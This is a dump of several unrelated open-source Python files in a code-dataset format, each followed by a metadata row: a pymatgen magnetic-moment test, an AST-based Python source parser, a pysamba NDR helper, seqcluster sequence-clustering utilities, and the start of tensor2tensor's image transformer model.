self.assertTrue(np.allclose(magmom1.get_moment(saxis=magmom2.saxis), magmom2.moment))
self.assertTrue(np.allclose(magmom2.get_moment(saxis=[0, 0, 1]), magmom1.moment))
self.assertTrue(np.allclose(magmom2.get_moment(saxis=magmom2.saxis), magmom2.moment))
self.assertTrue(np.allclose(magmom3.moment, magmom1.moment))
def test_is_collinear(self):
magmoms_list = [[0, 0, 0],
[1, 1, 1],
[[0, 0, 0], [0, 0, 0], [0, 0, 0]],
[[0, 0, 1], [0, 0, 1], [0, 0, 1]],
[[0, 0, -1], [0, 0, 1], [0, 0, 1]],
[[2, 2, 2], [-2, -2, -2], [2, 2, 2]]]
for magmoms in magmoms_list:
self.assertEqual(Magmom.are_collinear(magmoms), True)
ncl_magmoms = [[[0, 0, 1], [0, 0, 1], [1, 2, 3]]]
self.assertEqual(Magmom.are_collinear(ncl_magmoms), False)
def test_have_consistent_saxis(self):
magmom1 = Magmom([1, 2, 3])
magmom2 = Magmom([1, 2, 3])
magmom3 = Magmom([1, 2, 3], saxis=[0, 0, -1])
magmom4 = Magmom([1, 2, 3], saxis=[1, 2, 3])
self.assertTrue(Magmom.have_consistent_saxis([magmom1, magmom2]))
self.assertFalse(Magmom.have_consistent_saxis([magmom1, magmom3]))
self.assertFalse(Magmom.have_consistent_saxis([magmom1, magmom4]))
def test_get_consistent_set_and_saxis(self):
magmoms = [1, 1, 2, 2, 0, 0, 2]
magmoms, saxis = Magmom.get_consistent_set_and_saxis(magmoms)
self.assertTrue(np.allclose(saxis, [0, 0, 1]))
magmoms = [[0, 0, 0],
[1, 1, 1],
[2, 2, 2]]
magmoms, saxis = Magmom.get_consistent_set_and_saxis(magmoms)
self.assertTrue(np.allclose(saxis, [np.sqrt(1/3.)]*3))
def test_relative_to_crystal_axes(self):
lattice = Lattice.from_parameters(5, 10, 5, 90, 110, 90)
moment = [1, 0, 2]
magmom = Magmom.from_moment_relative_to_crystal_axes(moment, lattice)
self.assertTrue(np.allclose(magmom.moment, [0.93969262, 0.0, 1.65797986]))
self.assertTrue(np.allclose(magmom.get_moment_relative_to_crystal_axes(lattice), moment))
def test_equality(self):
self.assertTrue(Magmom([1, 1, 1]) == Magmom([1, 1, 1]))
self.assertFalse(Magmom([1, 1, 2]) == Magmom([1, 1, 1]))
self.assertTrue(Magmom([0, 0, 10]) == 10)
def test_negative(self):
self.assertEqual(-Magmom([1, 2, 3]), Magmom([-1, -2, -3]))
if __name__ == '__main__':
unittest.main()
| setten/pymatgen | pymatgen/electronic_structure/tests/test_core.py | Python | mit | 5,593 | ["pymatgen"] | a6c73a8387626c2d383d2e254c627539ad223ef2ae7a53e2f743598b33b7cef1 |
""" Parse Python source code.
This module provides a Parser class that may be used to parse Python source code
and retrieve various information from its abstract syntax tree.
"""
import __builtin__
import ast
import collections
import imp
import keyword
import string
##
# TODO
# - Handle global and nonlocal variables
# - Add support for underlining builtin variables and functions
# - Fix underlining variables in comprehensions
# - Currently the first name in the comp is considered part of the outside
# scope, when it should be linked with the next name
##
##
# \brief A namedtuple containing information about a function/class definition.
#
# \details The namedtuple has five fields: title (first line of definition),
# range (the line range), docstring, and type (one of function, class,
# or method).
#
_Definition = collections.namedtuple('_Definition', ['title', 'range',
'docstring', 'type'])
##
# \brief A namedtuple containing information about a navigation item.
#
# \details The namedtuple has two fields: name and type (as in _Definition).
#
NavigationItem = collections.namedtuple('NavigationItem', ['name', 'type'])
##
# \brief A namedtuple containing information about a variable location.
#
# \details The namedtuple has two fields: lineno and col_offset.
#
_VariableNode = collections.namedtuple('_VariableNode',
                                       ['lineno', 'col_offset'])
class Parser(object):
""" Provides an interface for parsing Python source code.
This class uses the source code string of Python code to generate an
abstract syntax tree for parsing. It provides several methods for retrieving
information about the tree, including variables defined and documentation
for functions and classes.
"""
def __init__(self, source=""):
""" Initialize the Parser class.
Keyword arguments:
source -> The source code string.
"""
self._tree = None
self._source = None
self.source = source
@property
def source(self):
""" Return the source code string. """
return self._source
@source.setter
def source(self, new_source):
""" Set and parse the source code.
If parsing the source fails, the source is not set, the tree is not
updated, and an exception is raised from the ast.parse method.
"""
self._tree = ast.parse(new_source)
self._source = unicode(new_source, 'UTF-8')
@property
def tree(self):
""" Return an abstract syntax tree of the source string. """
return self._tree
def variables(self, index):
""" Return a dict of defined variable names mapped to their index.
From the tree, extract all variable names from assignments and add all
Python keywords and function names that were not previously defined.
Parsing is done by finding the path that the index is on (by converting
it to a line number) after moving the line number backwards to the
previous non-whitespace-only line. Builtin variables are mapped to -1.
Arguments
index -> the index defining the scope of the search.
"""
# find previous line with any non-whitespace characters
lineno = self._calculate_lineno(index)
lines = self._source.splitlines()[:lineno]
while lines and (lines[-1] == "" or lines[-1].isspace()):
lines.pop()
new_lineno = len(lines)
# parse path in tree with node at line number
parser = _AssignParser()
parser.lineno = new_lineno
path = _get_path(self._tree, new_lineno)
for node in path:
parser.visit(node)
# calculate node index from line number and column offset
variables = {name: set(_calculate_index(self._source, node.lineno,
node.col_offset)
for node in nodes)
for (name, nodes) in parser.variables.items()}
# add builtins
builtins = dir(__builtin__) + keyword.kwlist
for builtin in builtins:
if builtin not in variables:
variables[builtin] = []
return {variable: (max(indices) if indices else -1)
for (variable, indices) in variables.items()}
def variable_indices(self, index):
""" Return a list of ranges for where the variable at index is used.
This method finds the variable name at the index and parses the tree
to find its scope. The scope is bounded by its first definition before
        index and its first definition after index (in the case of redefinition).
Each entry in the returned list is a 2-tuple with (index, length), where
length is the length of the variable.
Return an empty list if the index is out of bounds of the source, if no
word is at the index, or if the variable has not yet been defined.
"""
# Check index
if index < 0 or index >= len(self._source):
return []
# find variable name
variable = self._word_at_index(index)
if not variable:
return []
# find node defining the scope of the variable
lineno = self._calculate_lineno(index)
path = _get_path(self._tree, lineno)
scope_nodes = [node for node in reversed(path) if
isinstance(node, (ast.Module, ast.FunctionDef,
ast.ClassDef))]
scope_parser = _AssignParser(float('inf'))
for scope_node in scope_nodes:
scope_parser.visit(scope_node)
if variable in scope_parser.variables:
break
scope_parser.variables.clear()
else:
return [] # the variable name was not defined on the path
# find bounding definitions of variable in scope
variable_indices = sorted(_calculate_index(self._source, node.lineno,
node.col_offset)
for node in scope_parser.variables[variable])
prev_index = next((idx for idx in reversed(variable_indices)
if idx <= index), 0)
next_index = next((idx for idx in variable_indices if idx > index),
float('inf'))
# find ranges of all variable names within the scope
name_parser = _NameParser(variable)
name_parser.visit(scope_node)
name_indices = [_calculate_index(self._source, node.lineno,
node.col_offset)
for node in name_parser.names]
return [(idx, len(variable)) for idx in name_indices if
prev_index <= idx < next_index]
def documentation(self):
""" Return the documentation of functions and classes in an ast.
Extract the function names, class names, and all docstrings.
"""
def def_string(node, name):
""" Return a string of function line number, name and docstring. """
return "{0} {1}\n{2}".format(node.lineno, name,
ast.get_docstring(node) or "")
functions = {node.name: node for node in self._tree.body if
isinstance(node, ast.FunctionDef)}
for (i, name) in enumerate(functions):
node = functions[name]
functions[name] = def_string(node, name)
if i <= len(functions) - 1:
functions[name] += "\n\n"
classes = {node.name: node for node in self._tree.body if
isinstance(node, ast.ClassDef)}
for (i, name) in enumerate(classes):
node = classes[name]
classes[name] = def_string(node, name)
if i <= len(classes) - 1:
                classes[name] += "\n\n"
documentation = "Functions\n\n"
function_names = functions.keys()
function_names.sort()
class_names = classes.keys()
class_names.sort()
for name in function_names:
documentation += functions[name]
documentation += "Classes\n\n"
for name in class_names:
documentation += classes[name]
return documentation
def navigation(self):
""" Return a dict navigatable sections in the source code.
Dict keys are the line ranges of the navigation item mapped to a
NavigationItem containing the name, including the parenthesized function
arguments/subclasses, and definition type.
"""
visitor = _DefinitionParser(self._source)
visitor.visit(self._tree)
return {item.range: NavigationItem(name=item.title, type=item.type)
for item in visitor.definitions}
def nestable_lines(self):
""" Return the range of lines that are nestable.
Parse the tree for all start and end lines of a nestable group (e.g. a
        function definition or if statement). For each, return a tuple of the
start and end line number.
"""
nests = []
nodes = [ast.walk(node) for node in self._tree.body]
for node in nodes:
end = 0
for subnode in node:
if isinstance(subnode, (ast.FunctionDef, ast.ClassDef, ast.If,
ast.For, ast.TryExcept,
ast.TryFinally)):
end = 0
for subsubnode in ast.walk(subnode):
try:
lineno = subsubnode.lineno
except AttributeError:
pass
else:
if lineno > end:
end = lineno
nests.append((subnode.lineno, end))
return nests
def modules(self):
""" Return a dict of module names and module info.
Each value of the dict is a list of functions and classes as returned by
get_functions() and get_classes().
"""
modules = {}
for node in self._tree.body:
for subnode in ast.walk(node):
if isinstance(subnode, ast.Import):
module_name = subnode.names[0].name
elif isinstance(subnode, ast.ImportFrom):
module_name = subnode.module
imported_name = subnode.names[0].name
else:
continue
try:
module_tree = _parse_module(module_name)
except TypeError: # .so files
loaded_module = imp.load_dynamic(
module_name, imp.find_module(module_name)[1])
module_info = dir(loaded_module)
except IOError: # directories
loaded_module = imp.load_package(
module_name, imp.find_module(module_name)[1])
module_info = dir(loaded_module)
else:
module_info = self._functions() + self._classes()
finally:
if isinstance(subnode, ast.ImportFrom):
if imported_name in module_info:
modules[imported_name] = module_info[imported_name]
else:
modules[module_name] = module_info
return modules
def _calculate_lineno(self, index):
""" Return the line number that contains the given index. """
lines = self._source.splitlines(True)
if lines:
idx = 0
for (lineno, line) in enumerate(lines):
idx += len(line)
if idx >= index:
break
return lineno + 1
else:
return 1
def _word_at_index(self, index):
""" Return the word at an index or an empty string if in a boundary. """
chars = string.letters + string.digits + '_'
anchor = next((idx + 1 for idx in reversed(xrange(index + 1))
if self._source[idx] not in chars), 0)
bound = next((idx for idx in xrange(index, len(self._source))
if self._source[idx] not in chars), len(self._source))
return self._source[anchor:bound]
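# Illustrative sketch (hypothetical helper, not part of the original module):
# minimal usage of the Parser class defined above with a made-up source
# string. Nothing here runs at import time; call it manually to experiment.
def _parser_usage_sketch():
    sample = ("def greet(name):\n"
              "    message = 'hello ' + name\n"
              "    return message\n")
    parser = Parser(sample)
    docs = parser.documentation()                 # functions/classes with docstrings
    in_scope = parser.variables(len(sample) - 1)  # names visible near the end
    sections = parser.navigation()                # {(lineno, span): NavigationItem}
    return docs, in_scope, sections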
class _DefinitionParser(ast.NodeVisitor):
""" A NodeVisitor subclass to parse an ast for function/class definitions.
Visit all function and class definitions. For class definitions, visit all
children and assign their type as a method.
"""
def __init__(self, source):
""" Initialize the object.
Arguments
source -> the source code string.
"""
self.definitions = []
self._source = source
def visit_FunctionDef(self, node):
""" Add the definition of a function.
The visited node is added as a _Definition namedtuple. If there is not a
docstring, return an empty string instead. The node's children are
visited with generic_visit.
"""
self.definitions.append(self._visit_def(node, 'function'))
self.generic_visit(node)
def visit_ClassDef(self, node):
""" Add the definition of a class.
The visited node is added as a _Definition namedtuple. If there is not a
docstring, return an empty string instead. The node's children are
visited and functions are added with type method.
"""
self.definitions.append(self._visit_def(node, 'class'))
# visit children to find methods
for subnode in ast.iter_child_nodes(node):
if isinstance(subnode, ast.FunctionDef):
self.definitions.append(self._visit_def(subnode, 'method'))
self.generic_visit(subnode)
def _visit_def(self, node, def_type):
""" Return a _Definition namedtuple for a FunctionDef or ClassDef node.
First, determine the line number of the node. Nodes may begin with
decorators. Therefore, search from the starting line number of the node
until reaching the definition title.
Then, get the title of the node. The title is the first line of the
definition with the 'def' or 'class' stripped off. If the line contains
the full definition (i.e., ends in a colon), strip that off too.
Otherwise, end with ellipses.
Arguments
node -> the node to visit. It must be one of ast.FunctionDef or
ast.ClassDef.
def_type -> a string representing the type of definition (function,
class, or method).
"""
# determine line prefix
if isinstance(node, ast.FunctionDef):
prefix = 'def '
elif isinstance(node, ast.ClassDef):
prefix = 'class '
else:
raise ValueError(node)
# find starting lineno, skipping decorators
lineno = node.lineno
for line in self._source.splitlines()[node.lineno-1:]:
if line.strip().startswith(prefix):
break
lineno += 1
# get title
title = self._source.splitlines()[lineno-1].strip()
# strip off opening keyword and handle end of title
title = title[len(prefix):]
if title.endswith(':'):
title = title[:-1]
else:
title += ' ...'
# return _Definition namedtuple
end_lineno = self._node_end(node)
return _Definition(title=title,
range=(lineno, end_lineno - lineno + 1),
docstring=ast.get_docstring(node) or '',
type=def_type)
@staticmethod
def _node_end(node):
""" Return the ending line number of a node.
        The end line number is found by walking all subnodes of the input node
        with ast.walk and taking the largest line number among those that have
        one.
Arguments:
node -> the node. It must have a lineno attribute.
"""
end_lineno = node.lineno
for child in ast.walk(node):
try:
lineno = child.lineno
except AttributeError:
continue
if lineno > end_lineno:
end_lineno = lineno
return end_lineno
class _NameParser(ast.NodeVisitor):
""" A NodeVisitor subclass that parses an ast for nodes matching a name. """
def __init__(self, name):
""" Initialize the object with a name to find in the tree. """
self.name = name
self.names = set()
def visit_Name(self, node):
""" Visit a name. """
self._add_node(node, node.id)
def _visit_def(self, node):
""" Add the definition's name and generic_visit it.
The col_offset of the node is incremented to account for the def or
class string preceding the name of the definition.
"""
if isinstance(node, ast.FunctionDef):
node.col_offset += len('def ')
elif isinstance(node, ast.ClassDef):
node.col_offset += len('class ')
self._add_node(node, node.name)
self.generic_visit(node)
visit_FunctionDef = _visit_def
visit_ClassDef = _visit_def
def _add_node(self, node, name):
""" Add a node to the names dict.
Create a _VariableNode namedtuple and add it to the set at the key
'name' in the dict.
"""
if name == self.name:
self.names.add(_VariableNode(lineno=node.lineno,
col_offset=node.col_offset))
class _AssignParser(ast.NodeVisitor):
""" A NodeVisitor subclass that parses an ast for assignment variables.
Assignment variables are only saved if within the scope at a given line
number.
"""
def __init__(self, lineno=0):
""" Initialize the object with a line number.
Keyword arguments:
lineno -> the line number defining the parse scope.
"""
self.variables = collections.defaultdict(list)
self.lineno = lineno
def visit(self, node):
""" Visit a node if its line number is <= self.lineno. """
if (hasattr(node, 'lineno') and node.lineno <= self.lineno or
not hasattr(node, 'lineno')):
super(_AssignParser, self).visit(node)
def visit_Module(self, node):
""" Visit a module.
Add all defined variables and function/class definitions. Definition
names are added to the variables dict. Other nodes are visited with the
visit method.
"""
for subnode in node.body:
if isinstance(subnode, (ast.FunctionDef, ast.ClassDef)):
self._add_node(subnode, subnode.name)
else:
self.visit(subnode)
def visit_Assign(self, node):
""" Process all targets of an assignment.
This method uses the _visit_assign_target instance method.
"""
for target in node.targets:
self._visit_assign_target(target)
self.generic_visit(node)
def visit_For(self, node):
""" Visit a for loop.
Store all variables defined in its body as well as the variables
targeted in the loop definition.
"""
self._visit_assign_target(node.target)
self.generic_visit(node)
def _visit_comprehension(self, node):
""" Visit a list, dict, set, or genexp comprehension.
Iterate over all of the node's generators, visit the target
(the 'x' in "...for x in..."), and add them to the variables list.
If the target is a tuple, visit its elts.
"""
for comprehension in node.generators:
try:
name = comprehension.target.id
except AttributeError:
for elt in comprehension.target.elts:
self._add_node(elt, elt.id)
else:
self._add_node(comprehension.target, name)
visit_ListComp = _visit_comprehension
visit_SetComp = _visit_comprehension
visit_DictComp = _visit_comprehension
visit_GeneratorExp = _visit_comprehension
def _visit_def(self, node):
""" Visit a function/class definition.
Visit all nodes in the definition body. If one of these subnodes is
another definition, only add its name to the variables list. Otherwise,
visit it normally. Add the name of the definition node to the variables
list.
"""
for subnode in node.body:
if (isinstance(subnode, (ast.FunctionDef, ast.ClassDef)) and
subnode.lineno <= self.lineno):
self._add_node(subnode, subnode.name)
else:
self.visit(subnode)
self._add_node(node, node.name)
def visit_FunctionDef(self, node):
""" Visit a function definition.
This method uses the _visit_def instance method. If the node line number
is less than self.lineno, add all argument names to the variables list.
"""
self._visit_def(node)
if node.lineno < self.lineno:
for arg in node.args.args:
self._add_node(arg, arg.id)
visit_ClassDef = _visit_def
def _visit_import(self, node):
""" Visit an import or import from statement.
If the module is imported as another name, store that variable name;
otherwise, store the module name.
"""
for name in node.names:
if name.asname:
self._add_node(node, name.asname)
else:
self._add_node(node, name.name)
visit_Import = _visit_import
visit_ImportFrom = _visit_import
def _visit_assign_target(self, node):
""" Visit an assignment target.
Store the name or, if it is a tuple, all names within the tuple.
"""
try:
name = node.id
except AttributeError:
if isinstance(node, ast.Tuple):
for elt in node.elts:
self._add_node(elt, elt.id)
else:
self._add_node(node, name)
def _add_node(self, node, name):
""" Add a node to the variables dict.
Create a _VariableNode namedtuple and add it to the set at the key
'name' in the dict.
"""
self.variables[name].append(_VariableNode(lineno=node.lineno,
col_offset=node.col_offset))
def _iter_paths(tree, cur=()):
""" Return a generator of all paths in the abstract syntax tree.
Recursively yields each path through the tree.
Arguments:
tree -> the abstract syntax tree to search
Keyword arguments:
cur -> a tuple storing the walked path. Used for recursive calls.
"""
children = list(ast.iter_child_nodes(tree))
if not children:
yield cur
else:
for child in children:
for path in _iter_paths(child, cur + (child,)):
yield path
def _get_path(tree, lineno):
""" Return the path in a tree that terminates at a line number.
Follow all paths in a tree using _iter_paths until finding one where a node
is on the desired line number. The path is a tuple of nodes, including the
root ast.Module node. If no node is found with the particular line number,
return an empty tuple.
Arguments:
tree -> the abstract syntax tree to search
lineno -> the line number
"""
for path in list(_iter_paths(tree)):
for node in path:
try:
node_lineno = node.lineno
except AttributeError:
pass
else:
if node_lineno == lineno:
return (tree,) + path
return ()
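# Illustrative sketch (hypothetical helper, not part of the original module):
# how _iter_paths and _get_path behave on a tiny tree. Every root-to-leaf
# chain of child nodes is generated, and _get_path returns the first chain
# that touches the requested line number (prefixed with the Module node).
def _path_lookup_sketch():
    tree = ast.parse("x = 1\ny = x + 1\n")
    all_paths = list(_iter_paths(tree))   # chains ending at leaf nodes
    path_to_line_2 = _get_path(tree, 2)   # (Module, Assign, ...) on line 2
    return all_paths, path_to_line_2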
def _calculate_index(source, lineno, col_offset):
""" Return the index of a substring given a lineno and column.
Arguments:
source -> The source code string.
lineno -> The line number.
col_offset -> The column offset
"""
lines = source.splitlines(True)
return sum(len(line) for line in lines[:lineno-1]) + col_offset
def _parse_module(name):
""" Return an ast of the module at the absolute path. """
hierarchy = name.split('.')
name = hierarchy.pop()
if hierarchy:
pkg_path = _package_path(hierarchy)
module = imp.find_module(name, [pkg_path])
else:
module = imp.find_module(name)
tree = ast.parse(''.join(module[0].readlines()))
module[0].close()
return tree
def _package_path(hierarchy, pkg_path=None):
""" Return the path of a package.
Recursively search the hierarchy inwards to find the path of the innermost
entry.
Arguments:
hierarchy -> the result of package.split('.'), where package is the
absolute import name.
Keyword Arguments:
pkg_path -> May use this to begin the search path at a directory, but
its main purpose is for recursive calls to the function.
"""
if pkg_path:
pkg_path = [pkg_path]
if (len(hierarchy) == 1):
return imp.find_module(hierarchy[0], pkg_path)[1]
parent = hierarchy.pop(0)
parent_path = imp.find_module(parent, pkg_path)[1]
return _package_path(hierarchy, parent_path)
| liasis/introspector | Introspector/Parser/parse.py | Python | gpl-3.0 | 26,239 | ["VisIt"] | b838c12cd8ce892d6e744fd8ae968906b0dbfb1a2782326d5b74fbc663275cb2 |
###########################################################################
#
# This program is part of Zenoss Core, an open source monitoring platform.
# Copyright (C) 2008, Zenoss Inc.
#
# This program is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License version 2 as published by
# the Free Software Foundation.
#
# For complete information please visit: http://www.zenoss.com/oss/
#
###########################################################################
__doc__ = "Provide access to generic NDR routines"
from pysamba.library import library
NDR_OUT = 2
def debugPrint(text, printFunct, obj):
"Print an NDR structure to debug output"
library.ndr_print_function_debug(printFunct, text, NDR_OUT, obj)
| racemidev/WMI_cmd | pysamba/ndr.py | Python | gpl-2.0 | 775 | ["VisIt"] | db482a009dcb6674cba39760df0857b6cf95838ae9842d1868e0926d957078bc |
import operator
import os
import math
import seqcluster.libs.logger as mylog
logger = mylog.getLogger(__name__)
REMOVED = 0
def get_distance(p1, p2):
if p1.strand == "+":
d = p1.start-p2.start
else:
d = (p1.end-(p1.end-p1.start)) - (p2.end-(p2.end-p2.start))
return d
def get_ini_str(n):
    # return a string of n spaces (used as padding)
    return " " * n
def init_numlocidb(beds):
    counts = {}
    for filebed in beds:
        db = os.path.basename(filebed)
        counts[db] = 0
    return counts
def calc_complexity(nl):
ns = len(nl)
total = 0.0
for l in nl:
total += 1.0/l
#print(total)
total /= ns
return (total)
def calculate_size(vector):
maxfreq = 0
zeros = 0
counts = 0
total = len(vector.keys())
for s in vector.keys():
maxfreq = max(vector[s], maxfreq)
counts += int(vector[s])
if vector[s] == 0:
zeros += 1
    return counts * ((total - zeros) / float(total))
def show_seq(clus_obj, index):
"""Get the precursor and map sequences to it.
this way we create a positional map."""
current = clus_obj.clus
clus_seqt = clus_obj.seq
clus_locit = clus_obj.loci
itern = 0
for idc in current.keys():
itern += 1
timestamp = str(idc)
seqListTemp = ()
f = open("/tmp/"+timestamp+".fa","w")
for idl in current[idc].loci2seq.keys():
seqListTemp = list(set(seqListTemp).union(current[idc].loci2seq[idl]))
maxscore = 0
for s in seqListTemp:
score = calculate_size(clus_seqt[s].freq)
maxscore = max(maxscore,score)
clus_seqt[s].score = score
seq = clus_seqt[s]
f.write(">"+s+"\n"+seq.seq+"\n")
f.close()
locilen_sorted = sorted(current[idc].locilen.iteritems(), key = operator.itemgetter(1),reverse = True)
lmax = clus_locit[locilen_sorted[0][0]]
f = open("/tmp/"+timestamp+".bed","w")
f.write("%s\t%s\t%s\t.\t.\t%s\n" % (lmax.chr,lmax.start,lmax.end,lmax.strand))
f.close()
os.system("bedtools getfasta -s -fi "+index+" -bed /tmp/"+timestamp+".bed -fo /tmp/"+timestamp+".pre.fa")
os.system("bowtie2-build /tmp/"+timestamp+".pre.fa /tmp/"+timestamp+".pre.ind >/dev/null 2>&1")
os.system("bowtie2 --rdg 7,3 --mp 4 --end-to-end --no-head --no-sq -D 20 -R 3 -N 0 -i S,1,0.8 -L 3 -f /tmp/"+timestamp+".pre.ind /tmp/"+timestamp+".fa -S /tmp/"+timestamp+".map >>bowtie.log 2>&1")
f = open("/tmp/"+timestamp+".map","r")
seqpos = {}
minv = 10000000
for line in f:
line = line.strip()
cols = line.split("\t")
seqpos[cols[0]] = int(cols[3])
if minv>int(cols[3]):
minv = int(cols[3])
f.close()
seqpos_sorted = sorted(seqpos.iteritems(), key = operator.itemgetter(1),reverse = False)
showseq = ""
showseq_plain = ""
for (s,pos) in seqpos_sorted:
ratio = (clus_seqt[s].score*1.0/maxscore*100.0)
realScore = (math.log(ratio,2)*2)
if realScore<0:
realScore = 0
# "score %s max %s ratio %s real %.0f" % (clus_seqt[s].score,maxscore,ratio,realScore)
##calculate the mean expression of the sequence and change size letter
showseq_plain += "<br>%s<a style = \"font-size:%.0fpx;\"href = javascript:loadSeq(\"%s\")>%s</a>" % ("".join("." for i in range(pos-1)),realScore+10,s,clus_seqt[s].seq)
#showseq+ = seqviz.addseq(pos-1,clus_seqt[s].len,clus_seqt[s].seq)
#current[idc].showseq = showseq
current[idc].showseq_plain = showseq_plain
os.system("rm /tmp/"+timestamp+"*")
clus_obj.clus = current
clus_obj.seq = clus_seqt
return clus_obj
def generate_position_bed(clus_obj):
##generate file with positions in bed format
bedaligned = ""
clus_id = clus_obj.clus
for idc in clus_id.keys():
clus = clus_id[idc]
for idl in clus.loci2seq.keys():
pos = clus_obj.loci[idl]
bedaligned += "%s\t%s\t%s\t%s\t%s\t%s\n" % (pos.chr,pos.start,pos.end,idc,idl,pos.strand)
return bedaligned
def _normalize_seqs(s, t):
"""Normalize to DESeq2"""
for ids in s:
obj = s[ids]
[obj.norm_freq.update({sample: 1.0 * obj.freq[sample] / t[sample]}) for sample in obj.norm_freq]
s[ids] = obj
return s
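# Illustrative sketch (hypothetical helper, not part of the original module):
# the per-sample scaling performed by _normalize_seqs, shown with plain dicts
# of made-up numbers (raw frequencies divided by per-sample totals).
def _normalize_freq_sketch(freq, totals):
    # e.g. freq = {"s1": 10, "s2": 40}, totals = {"s1": 100, "s2": 200}
    # -> {"s1": 0.1, "s2": 0.2}
    return dict((sample, 1.0 * freq[sample] / totals[sample]) for sample in freq)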
| lpantano/seqcluster | seqcluster/libs/tool.py | Python | mit | 4,514 | ["Bowtie"] | 496ab4ed4a3bfd2d1b6633470366b474987cc8699c5ae40406595ef0f22f3624 |
# coding=utf-8
# Copyright 2022 The Tensor2Tensor Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""image generation with transformer (attention).
encoder: [Self-Attention, Feed-forward] x n
decoder: [Self-Attention, Source-Target-Attention, Feed-forward] x n
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import copy
from tensor2tensor.layers import common_hparams
from tensor2tensor.layers import common_image_attention as cia
from tensor2tensor.layers import common_layers
from tensor2tensor.layers import modalities
from tensor2tensor.utils import registry
from tensor2tensor.utils import t2t_model
import tensorflow.compat.v1 as tf
@registry.register_model
class Imagetransformer(t2t_model.T2TModel):
"""Conditional image generation with attention. See file docstring.
The model admits either a Categorical or discretized mixture of logistic
distributions (DMOL) as the likelihood. When using DMOL for training, double
check that the evaluation metrics also use it.
"""
def body(self, features):
hparams = copy.copy(self._hparams)
targets = features["targets"]
if (hparams.likelihood == cia.DistributionType.DMOL and
hparams.num_channels != 1):
raise ValueError("When using DMOL for the likelihood, bottom function "
" must be identity and num_channels must be 1.")
if (not tf.get_variable_scope().reuse and
hparams.mode != tf.estimator.ModeKeys.PREDICT):
tf.summary.image("targets", tf.to_float(targets), max_outputs=1)
# Extra losses list if we want to use moe.
losses = []
# Prepare decoder inputs and bias.
decoder_input, rows, cols = cia.prepare_decoder(targets, hparams)
# Add class label to decoder input.
if not hparams.unconditional:
inputs = features["inputs"]
decoder_input += tf.reshape(
inputs,
[common_layers.shape_list(targets)[0], 1, 1, hparams.hidden_size])
decoder_output = cia.transformer_decoder_layers(
decoder_input,
None,
hparams.num_decoder_layers or hparams.num_hidden_layers,
hparams,
attention_type=hparams.dec_attention_type,
losses=losses,
name="decoder")
output = cia.create_output(decoder_output, rows, cols, targets, hparams)
if losses:
return output, {"extra_loss": tf.add_n(losses)}
else:
return output
def loss(self, logits, features):
if self._hparams.likelihood == cia.DistributionType.DMOL:
return common_layers.dml_loss(logits, features["targets"])
return super(Imagetransformer, self).loss(logits, features)
def sample(self, features):
"""Run the model and extract samples.
Args:
      features: a map of string to `Tensor`.
Returns:
samples: an integer `Tensor`.
logits: a list of `Tensor`s, one per datashard.
losses: a dictionary: {loss-name (string): floating point `Scalar`}.
"""
if self._hparams.likelihood == cia.DistributionType.DMOL:
logits, losses = self(features) # pylint: disable=not-callable
samples = common_layers.sample_from_discretized_mix_logistic(
logits, seed=None)
return samples, logits, losses
return super(Imagetransformer, self).sample(features)
def _slow_greedy_infer(self, features, decode_length):
"""A slow greedy inference method.
Quadratic time in decode_length.
Args:
      features: a map of string to `Tensor`
decode_length: an integer. How many additional timesteps to decode.
Returns:
samples: an integer `Tensor`.
logits: `Tensor` of shape [batch_size, time, 1, 1, vocab_size].
losses: a dictionary: {loss-name (string): floating point `Scalar`}
"""
if self._hparams.likelihood == cia.DistributionType.DMOL:
raise NotImplementedError("Decoding is not currently available for DMOL.")
return super(Imagetransformer, self)._slow_greedy_infer(features,
decode_length)
@registry.register_model
class ImagetransformerMoe(t2t_model.T2TModel):
"""Conditional image generation with attention and MoE."""
@staticmethod
def use_body_sharded():
return True
def body_sharded(self, sharded_features):
dp = self._data_parallelism
hparams = copy.copy(self._hparams)
inputs = sharded_features["inputs"]
targets = sharded_features["targets"]
# Determine attention type and padding from hparams.
q_padding, kv_padding = "VALID", "VALID"
if hparams.q_filter_width > 1:
q_padding = "LEFT"
if hparams.kv_filter_width > 1:
kv_padding = "LEFT"
# Prepare decoder inputs and bias.
decoder_input, rows, cols = dp(cia.prepare_decoder_inputs,
inputs, targets, hparams)
# Run decoder.
# TODO(nikip): Use q_padding and kv_padding
del q_padding, kv_padding
decoder_output, extra_loss = cia.transformer_layers_sharded(
dp,
self._ps_devices,
decoder_input,
hparams.num_hidden_layers,
hparams,
self_attention_bias=None,
enc_output=None,
attention_type=hparams.dec_attention_type,
name="decoder")
output = dp(cia.create_output, decoder_output, rows, cols, targets, hparams)
return output, extra_loss
@registry.register_hparams
def image_transformer_base():
"""Set of hyperparameters."""
hparams = common_hparams.basic_params1()
hparams.hidden_size = 512
hparams.batch_size = 4
hparams.max_length = 3075
hparams.dropout = 0.0
hparams.clip_grad_norm = 0. # i.e. no gradient clipping
hparams.optimizer_adam_epsilon = 1e-9
hparams.learning_rate_decay_scheme = "noam"
hparams.learning_rate = 0.1
hparams.learning_rate_warmup_steps = 4000
hparams.initializer_gain = 0.2
hparams.num_hidden_layers = 6
hparams.initializer = "uniform_unit_scaling"
hparams.weight_decay = 0.0
hparams.optimizer_adam_beta1 = 0.9
hparams.optimizer_adam_beta2 = 0.98
hparams.label_smoothing = 0.0
hparams.bottom["targets"] = modalities.image_channel_embeddings_bottom
hparams.top["targets"] = modalities.identity_top
hparams.norm_type = "layer"
hparams.layer_prepostprocess_dropout = 0.0
hparams.add_hparam("filter_size", 512) # Add new ones like this.
# attention-related flags
hparams.add_hparam("num_heads", 8)
hparams.add_hparam("attention_key_channels", 0)
hparams.add_hparam("attention_value_channels", 0)
hparams.add_hparam("ffn_layer", "conv_hidden_relu")
# All hyperparameters ending in "dropout" are automatically set to 0.0
# when not in training mode.
hparams.add_hparam("attention_dropout", 0.0)
hparams.add_hparam("relu_dropout", 0.0)
hparams.add_hparam("pos", "timing") # timing, none
hparams.add_hparam("nbr_decoder_problems", 1)
hparams.add_hparam("num_output_layers", 3)
hparams.add_hparam("block_size", 1)
# dilated attention based flags
